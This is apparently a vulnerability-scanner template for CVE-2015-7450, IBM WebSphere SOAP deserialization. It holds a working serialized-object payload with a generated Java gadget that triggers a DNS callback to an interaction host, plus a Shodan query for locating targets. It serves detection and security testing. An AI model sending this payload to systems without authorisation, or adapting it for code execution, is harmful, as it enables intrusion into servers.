id: CVE-2015-7450
info:
name: IBM WebSphere Java Object Deserialization - Remote Code Execution
author: wdahlenb
severity: critical
description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default).
reference:
- https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2015-7450
- http://www-01.ibm.com/support/docview.wss?uid=swg21972799
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2015-7450
cwe-id: CWE-94
metadata:
shodan-query: http.html:"IBM WebSphere Portal"
tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=utf-8
SOAPAction: "urn:AdminService"
rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==
getUnsavedChanges
{{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}}
rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
words:
- 'SOAP-ENV:Server'
- ''
condition: and
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
# Enhanced by mp on 2022/05/10